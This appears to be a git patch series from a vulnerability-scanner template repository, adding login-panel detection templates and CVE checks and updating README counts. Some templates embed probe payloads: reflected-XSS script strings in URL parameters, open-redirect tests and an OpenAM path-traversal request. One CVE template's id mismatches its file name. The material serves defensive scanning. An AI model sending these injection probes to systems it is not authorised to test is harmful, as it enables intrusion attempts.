Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 364 | vulnerabilities | 198 | exposed-panels | 159 | +| cves | 365 | vulnerabilities | 198 | exposed-panels | 159 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1358 files**. +**120 directories, 1359 files**. From 08e4fbd96ac32c836a0f1898028d408d61461b51 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 16:17:09 +0000 Subject: [PATCH 0119/4083] Auto Update README [Mon Jun 28 16:17:09 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 729a4685c2..c4708a2dbf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 365 | vulnerabilities | 198 | exposed-panels | 159 | +| cves | 365 | vulnerabilities | 199 | exposed-panels | 159 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1359 files**. +**120 directories, 1360 files**. From 62ebcaac581aefaf6ad9d528c8f23563b99d5912 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 28 Jun 2021 19:20:46 +0200 Subject: [PATCH 0120/4083] Add detection of APIMAN See https://www.apiman.io --- exposed-panels/apiman-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/apiman-panel.yaml diff --git a/exposed-panels/apiman-panel.yaml b/exposed-panels/apiman-panel.yaml new file mode 100644 index 0000000000..eb3fa9f385 --- /dev/null +++ b/exposed-panels/apiman-panel.yaml @@ -0,0 +1,24 @@ +id: apiman-panel + +info: + name: Apiman Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a Apiman instance via the login redirection + tags: panel,apiman + +requests: + - method: GET + path: + - "{{BaseURL}}/apimanui/api-manager" + + matchers-condition: and + matchers: + - type: word + words: + - "/auth/realms/apiman" + part: header + + - type: status + status: + - 302 \ No newline at end of file From f959b69a5d258b8d7e6a43cdf3f923b2b444957f Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 28 Jun 2021 19:43:39 +0200 Subject: [PATCH 0121/4083] Add detection of KEYCLOAK See https://www.keycloak.org/ --- keycloak-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 keycloak-panel.yaml diff --git a/keycloak-panel.yaml b/keycloak-panel.yaml new file mode 100644 index 0000000000..3a89fac6e5 --- /dev/null +++ b/keycloak-panel.yaml @@ -0,0 +1,24 @@ +id: keycloak-panel + +info: + name: Keycloak Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a Keycloak instance via the login panel + tags: panel,keycloak + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/admin" + redirects: true + + matchers-condition: and + matchers: + - type: word + words: + - "keycloak" + + - type: status + status: + - 200 \ No newline at end of file From f4ceaddd136edf7b52f562d2176fcf918de87967 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 28 Jun 2021 20:12:24 +0200 Subject: [PATCH 0122/4083] Add WILFLY detection See https://www.wildfly.org/ --- exposed-panels/wildfly-panel.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/wildfly-panel.yaml diff --git a/exposed-panels/wildfly-panel.yaml b/exposed-panels/wildfly-panel.yaml new file mode 100644 index 0000000000..87563eb4c3 --- /dev/null +++ b/exposed-panels/wildfly-panel.yaml @@ -0,0 +1,24 @@ +id: wildfly-panel + +info: + name: WildFly Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a WildFly (ex-JBoss) instance via the login panel + tags: panel,jboss,wildfly + +requests: + - method: GET + path: + - "{{BaseURL}}/" + redirects: true + + matchers-condition: and + matchers: + - type: word + words: + - "Welcome to WildFly" + + - type: status + status: + - 200 \ No newline at end of file From 2a1772d78c3be0b4aa9843f824d2c0a074061733 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 28 Jun 2021 23:58:31 +0530 Subject: [PATCH 0123/4083] misc changes --- ...multiple-theme-ssrf.yaml => wp-multiple-theme-ssrf.yaml} | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) rename vulnerabilities/wordpress/{multiple-theme-ssrf.yaml => wp-multiple-theme-ssrf.yaml} (88%) diff --git a/vulnerabilities/wordpress/multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml similarity index 88% rename from vulnerabilities/wordpress/multiple-theme-ssrf.yaml rename to vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml index ddc5a6a584..a0a6785d10 100644 --- a/vulnerabilities/wordpress/multiple-theme-ssrf.yaml +++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml @@ -1,6 +1,7 @@ -id: multiple-theme-ssrf +id: wp-multiple-theme-ssrf + info: - name: Multiple Themes - Unauthenticated Function Injection + name: WordPress Multiple Themes - Unauthenticated Function Injection author: madrobot severity: high tags: wordpress,rce,ssrf @@ -25,6 +26,7 @@ requests: - "Example Domain" - "protocol_version" part: body + - type: status status: - 200 From 96c425c382929956ac584725dfac4677279873bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 18:29:13 +0000 Subject: [PATCH 0124/4083] Auto Update README [Mon Jun 28 18:29:13 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c4708a2dbf..aa3719b426 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 365 | vulnerabilities | 199 | exposed-panels | 159 | +| cves | 365 | vulnerabilities | 200 | exposed-panels | 159 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1360 files**. +**120 directories, 1361 files**. From 63398e83bf2e989b1c4189268b66f33a5cda80e8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 18:41:54 +0000 Subject: [PATCH 0125/4083] Auto Update README [Mon Jun 28 18:41:53 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index aa3719b426..3efd0d4b8a 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1361 files**. +**120 directories, 1364 files**. From 973114272e80377b9d2323eab6b05c4f1bd20515 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 28 Jun 2021 18:43:07 +0000 Subject: [PATCH 0126/4083] Auto Update README [Mon Jun 28 18:43:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 3efd0d4b8a..00bc42bc23 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 365 | vulnerabilities | 200 | exposed-panels | 159 | +| cves | 365 | vulnerabilities | 200 | exposed-panels | 160 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1364 files**. +**120 directories, 1365 files**. From 54f40d8f2cef0370a5d0b341b4b5a2f02f09bee6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 29 Jun 2021 02:17:42 +0000 Subject: [PATCH 0127/4083] Update CVE-2018-13380.yaml --- cves/2018/CVE-2018-13380.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-13380.yaml b/cves/2018/CVE-2018-13380.yaml index 6941f8a8c1..7f1eafb134 100644 --- a/cves/2018/CVE-2018-13380.yaml +++ b/cves/2018/CVE-2018-13380.yaml @@ -13,6 +13,7 @@ requests: - method: GET path: - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E" + - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E" matchers-condition: and matchers: From 4ae3ef478f22480fef56868467978418718774f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:22:02 +0530 Subject: [PATCH 0128/4083] Create zoho-manageengine-servicedesk.yaml --- .../zoho-manageengine-servicedesk.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-servicedesk.yaml diff --git a/exposed-panels/zoho-manageengine-servicedesk.yaml b/exposed-panels/zoho-manageengine-servicedesk.yaml new file mode 100644 index 0000000000..04a5549333 --- /dev/null +++ b/exposed-panels/zoho-manageengine-servicedesk.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-servicedesk + +info: + name: ZOHO-ManageEngine-ServiceDesk + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ManageEngine ServiceDesk Plus' + - type: status + status: + - 200 From fd4a3afcbd4876fe7eaeac5a4b8d4c4ba7b3afea Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:23:17 +0530 Subject: [PATCH 0129/4083] Create zoho-manageengine-assetexplorer.yaml --- .../zoho-manageengine-assetexplorer.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-assetexplorer.yaml diff --git a/exposed-panels/zoho-manageengine-assetexplorer.yaml b/exposed-panels/zoho-manageengine-assetexplorer.yaml new file mode 100644 index 0000000000..218278bb91 --- /dev/null +++ b/exposed-panels/zoho-manageengine-assetexplorer.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-assetexplorer + +info: + name: ZOHO-ManageEngine-AssetExplorer + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ManageEngine AssetExplorer' + - type: status + status: + - 200 From 134d28b2f551ff9adfd5e9c3d482519734fcb47d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:28:47 +0530 Subject: [PATCH 0130/4083] Create zoho-manageengine-applications-manager.yaml --- ...oho-manageengine-applications-manager.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-applications-manager.yaml diff --git a/exposed-panels/zoho-manageengine-applications-manager.yaml b/exposed-panels/zoho-manageengine-applications-manager.yaml new file mode 100644 index 0000000000..9fa08b817a --- /dev/null +++ b/exposed-panels/zoho-manageengine-applications-manager.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-applications-manager + +info: + name: ZOHO-ManageEngine-Applications-Manager + author: dhiyaneshDK + severity: info + reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLU1hbmFnZUVuZ2luZS1BcHBsaWNhdGlvbnMtTWFuYWdlciI%3D + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/index.do' + + matchers-condition: and + matchers: + - type: word + words: + - 'Applications Manager Login Screen' + - type: status + status: + - 200 From 098e55b556484d3a8bccae8dcaca20319020542c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:31:50 +0530 Subject: [PATCH 0131/4083] Create zoho-manageengine-desktop.yaml --- exposed-panels/zoho-manageengine-desktop.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-desktop.yaml diff --git a/exposed-panels/zoho-manageengine-desktop.yaml b/exposed-panels/zoho-manageengine-desktop.yaml new file mode 100644 index 0000000000..402f49b29e --- /dev/null +++ b/exposed-panels/zoho-manageengine-desktop.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-desktop + +info: + name: ZOHO-ManageEngine-Desktop + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+Desktop+Central+10%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/configurations' + + matchers-condition: and + matchers: + - type: word + words: + - 'ManageEngine Desktop Central 10' + - type: status + status: + - 200 From dd23a4984bb7843933368a005f821031ed0df11c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:35:06 +0530 Subject: [PATCH 0132/4083] Create zoho-manageengine-apex-helpdesk.yaml --- .../zoho-manageengine-apex-helpdesk.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-apex-helpdesk.yaml diff --git a/exposed-panels/zoho-manageengine-apex-helpdesk.yaml b/exposed-panels/zoho-manageengine-apex-helpdesk.yaml new file mode 100644 index 0000000000..d62864cc40 --- /dev/null +++ b/exposed-panels/zoho-manageengine-apex-helpdesk.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-apex-helpdesk + +info: + name: ZOHO-ManageEngine-APEX-IT-Help-Desk + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22APEX+IT+Help+Desk%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/jsp/index.jsp' + + matchers-condition: and + matchers: + - type: word + words: + - 'APEX IT Help Desk' + - type: status + status: + - 200 From e3ddaa377e5d560715658dc00bb98285208f7284 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:38:05 +0530 Subject: [PATCH 0133/4083] Create zoho-manageengine-supportcenter.yaml --- .../zoho-manageengine-supportcenter.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-supportcenter.yaml diff --git a/exposed-panels/zoho-manageengine-supportcenter.yaml b/exposed-panels/zoho-manageengine-supportcenter.yaml new file mode 100644 index 0000000000..23613106bd --- /dev/null +++ b/exposed-panels/zoho-manageengine-supportcenter.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-supportcenter + +info: + name: ZOHO-ManageEngine-SupportCenter + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+SupportCenter+Plus%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ManageEngine SupportCenter Plus' + - type: status + status: + - 200 From 909bdab0b9cce8f52e8f7d34b859d684caa5fe8f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:40:26 +0530 Subject: [PATCH 0134/4083] Create zoho-manageengine-adaudit.yaml --- exposed-panels/zoho-manageengine-adaudit.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-adaudit.yaml diff --git a/exposed-panels/zoho-manageengine-adaudit.yaml b/exposed-panels/zoho-manageengine-adaudit.yaml new file mode 100644 index 0000000000..8e147d3750 --- /dev/null +++ b/exposed-panels/zoho-manageengine-adaudit.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-adaudit + +info: + name: ZOHO-ManageEngine-ADAudit + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+-+ADManager+Plus%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ManageEngine - ADManager Plus' + - type: status + status: + - 200 From f2bd3d3140b5e25c85ed58c36297279f5174f474 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:44:39 +0530 Subject: [PATCH 0135/4083] Create zoho-manageengine-opmanager.yaml --- .../zoho-manageengine-opmanager.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-opmanager.yaml diff --git a/exposed-panels/zoho-manageengine-opmanager.yaml b/exposed-panels/zoho-manageengine-opmanager.yaml new file mode 100644 index 0000000000..2da154b75d --- /dev/null +++ b/exposed-panels/zoho-manageengine-opmanager.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-opmanager + +info: + name: ZOHO-ManageEngine-OpManager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22OpManager+Plus%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - '

OpManager Plus' + - type: status + status: + - 200 From 56b25d9000e89fe99dddee831e14373b86d2598f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:50:46 +0530 Subject: [PATCH 0136/4083] Create zoho-manageengine-analyticsplus.yaml --- .../zoho-manageengine-analyticsplus.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-analyticsplus.yaml diff --git a/exposed-panels/zoho-manageengine-analyticsplus.yaml b/exposed-panels/zoho-manageengine-analyticsplus.yaml new file mode 100644 index 0000000000..b6d6d15b23 --- /dev/null +++ b/exposed-panels/zoho-manageengine-analyticsplus.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-analyticsplus + +info: + name: ZOHO-ManageEngine-Analytics Plus + author: dhiyaneshDK + severity: info + reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/iam/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'ManageEngine Analytics Plus' + - type: status + status: + - 200 From f743ca3b275a1c9a6f5ba14930e37de63c090c34 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 29 Jun 2021 08:53:43 +0530 Subject: [PATCH 0137/4083] Create zoho-manageengine-adselfservice-plus.yaml --- .../zoho-manageengine-adselfservice-plus.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/zoho-manageengine-adselfservice-plus.yaml diff --git a/exposed-panels/zoho-manageengine-adselfservice-plus.yaml b/exposed-panels/zoho-manageengine-adselfservice-plus.yaml new file mode 100644 index 0000000000..ad40e711ab --- /dev/null +++ b/exposed-panels/zoho-manageengine-adselfservice-plus.yaml @@ -0,0 +1,22 @@ +id: zoho-manageengine-adselfservice-plus + +info: + name: ZOHO-ManageEngine-ADSelfService Plus + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/authorization.do' + + matchers-condition: and + matchers: + - type: word + words: + - 'ADSelfService Plus' + - type: status + status: + - 200 From b46dc119e7c13716c813d1cf5820ed871f8438b3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 29 Jun 2021 10:07:07 +0530 Subject: [PATCH 0138/4083] Update CVE-2017-12794.yaml --- cves/2017/CVE-2017-12794.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index cbf3516606..08821c1780 100644 --- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml @@ -14,7 +14,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/create_user/?username=" + - "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers-condition: and matchers: @@ -26,3 +26,8 @@ requests: - type: status status: - 200 + + - type: word + words: + - "text/html" + part: header From 880d856372c63389feee0e63de06ac95b21e152f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 29 Jun 2021 04:38:29 +0000 Subject: [PATCH 0139/4083] Auto Update README [Tue Jun 29 04:38:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 00bc42bc23..6bfa860b31 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 365 | vulnerabilities | 200 | exposed-panels | 160 | +| cves | 366 | vulnerabilities | 200 | exposed-panels | 160 | | takeovers | 68 | exposures | 106 | technologies | 107 | | misconfiguration | 71 | workflows | 32 | miscellaneous | 26 | | default-logins | 32 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**120 directories, 1365 files**. +**120 directories, 1366 files**. From 8ae56492d87b3cd5d4b3608d2cdfcee8e5aa3ea6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 29 Jun 2021 10:13:41 +0530 Subject: [PATCH 0140/4083] Update CVE-2021-29203.yaml --- cves/2021/CVE-2021-29203.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-29203.yaml b/cves/2021/CVE-2021-29203.yaml index 12120d1eda..4150776495 100644 --- a/cves/2021/CVE-2021-29203.yaml +++ b/cves/2021/CVE-2021-29203.yaml @@ -38,6 +38,7 @@ requests: - "X-Auth-Token" - "PasswordReset" - "Location" + condition: and part: header - type: word words: From 2d826f339156df641bca498b00f29b98403ac89a Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 29 Jun 2021 12:41:19 +0530 Subject: [PATCH 0141/4083] More edge cases --- cves/2012/CVE-2012-3153.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml index 2dc29be6e2..cd8db5f3dc 100755 --- a/cves/2012/CVE-2012-3153.yaml +++ b/cves/2012/CVE-2012-3153.yaml @@ -34,8 +34,8 @@ requests: - type: dsl dsl: - - '!contains(body_2, "")' - - '!contains(body_2, "")' + - '!contains(body_2, " Date: Tue, 29 Jun 2021 19:03:18 +0900 Subject: [PATCH 0142/4083] Create CVE-2021-24210.yaml --- CVE-2021-24210.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 CVE-2021-24210.yaml diff --git a/CVE-2021-24210.yaml b/CVE-2021-24210.yaml new file mode 100644 index 0000000000..0feacdcff3 --- /dev/null +++ b/CVE-2021-24210.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-24210 + +info: + name: PhastPress < 1.111 - Open Redirect + author: 0x_Akoko + description: There is an open redirect in the plugin that allows an attacker to malform a request to a page with the plugin and then redirect the victim to a malicious page. + reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb + severity: low + tags: wp,cves,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From b108b643ce1cb92bce06720684f740640e4bb546 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 29 Jun 2021 19:05:09 +0900 Subject: [PATCH 0143/4083] Create CVE-2021-24406.yaml --- CVE-2021-24406.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 CVE-2021-24406.yaml diff --git a/CVE-2021-24406.yaml b/CVE-2021-24406.yaml new file mode 100644 index 0000000000..b88fc2ac9f --- /dev/null +++ b/CVE-2021-24406.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-24406 + +info: + name: wpForo Forum < 1.9.7 - Open Redirect + author: 0x_Akoko + description: The plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. + reference: https://wpscan.com/vulnerability/a9284931-555b-4c96-86a3-09e1040b0388 + severity: low + tags: wp,redirect,cves + +requests: + - method: GET + path: + - "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 2d4c8cb43485708319a7e57ab84017f30113a38d Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Tue, 29 Jun 2021 17:26:37 +0530 Subject: [PATCH 0144/4083] Create CVE-2021-35464.yaml --- cves/2021/CVE-2021-35464.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-35464.yaml diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml new file mode 100644 index 0000000000..be87b9b417 --- /dev/null +++ b/cves/2021/CVE-2021-35464.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-24237 + +info: + author: madrobot + name: Pre-auth RCE in ForgeRock OpenAM + description: ForgeRock OpenAM unsafe Java deserialization RCE. + severity: critical + tags: cve,cve2021,openam,rce,java + reference: | + - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + +requests: + - method: GET + path: + - '{{BaseURL}}/openam/oauth2/..;/ccversion/Version' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "X-OPNET-Transaction-Trace" + - "Set-Cookie: JSESSIONID=" + part: header + condition: and From d564c257d8ce467dd26d89ba1e0215eb5215561e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 29 Jun 2021 17:26:42 +0530 Subject: [PATCH 0145/4083] Additional check add --- vulnerabilities/generic/open-redirect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 938c0644ca..a831248bd0 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -34,8 +34,15 @@ requests: - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - '{{BaseURL}}/1/_https@example.com' + + matchers-condition: and matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header + + - type: status + status: + - 302 + - 301 From 158d968350cd800d7a749ede09831f94d06db71c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 29 Jun 2021 17:36:47 +0530 Subject: [PATCH 0146/4083] more tags --- exposed-panels/zoho-manageengine-adaudit.yaml | 5 +++-- exposed-panels/zoho-manageengine-adselfservice-plus.yaml | 3 ++- exposed-panels/zoho-manageengine-analyticsplus.yaml | 5 +++-- exposed-panels/zoho-manageengine-apex-helpdesk.yaml | 5 +++-- exposed-panels/zoho-manageengine-applications-manager.yaml | 3 ++- exposed-panels/zoho-manageengine-assetexplorer.yaml | 5 +++-- exposed-panels/zoho-manageengine-desktop.yaml | 5 +++-- exposed-panels/zoho-manageengine-opmanager.yaml | 3 ++- exposed-panels/zoho-manageengine-servicedesk.yaml | 3 ++- exposed-panels/zoho-manageengine-supportcenter.yaml | 5 +++-- 10 files changed, 26 insertions(+), 16 deletions(-) diff --git a/exposed-panels/zoho-manageengine-adaudit.yaml b/exposed-panels/zoho-manageengine-adaudit.yaml index 8e147d3750..4559d0164a 100644 --- 